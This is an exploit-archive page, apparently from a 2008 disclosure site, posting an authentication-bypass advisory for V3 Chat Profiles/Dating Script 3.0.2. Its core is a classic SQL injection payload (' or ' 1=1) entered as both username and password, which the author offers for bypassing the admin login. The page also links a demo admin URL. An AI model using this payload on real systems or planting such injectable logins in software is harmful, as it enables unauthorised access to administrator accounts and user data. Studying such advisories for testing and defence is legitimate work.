[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : V3 Chat Profiles/Dating Script 3.0.2 (Auth Bypass) SQL Injection Vuln
# Published : 2008-11-08
# Author : d3b4g
# Previous Title : Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln
# Next Title : ZEEJOBSITE 2.0 Remote File Upload Vulnerability


[~] V3 Chat - Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability
[~]
[~] -----------------------------------------------------------------
[~] Discovered By: d3b4g
[~]
[~] contact: bl4ckend[at]gmail[dot]com  
[~] 
[~] Risk: High

 ---------------------------------------------------------------------

Exploit: USe this information to bypass admin login

username: ' or ' 1=1

password: ' or ' 1=1
-----------------------------------------------------------------------

Demo: http://v3chat.com/v3profiles/admin/



[~]----------------------------------------------------------------------
[~] Greetz tO: All fu3k3rz

# www.Syue.com [2008-11-08]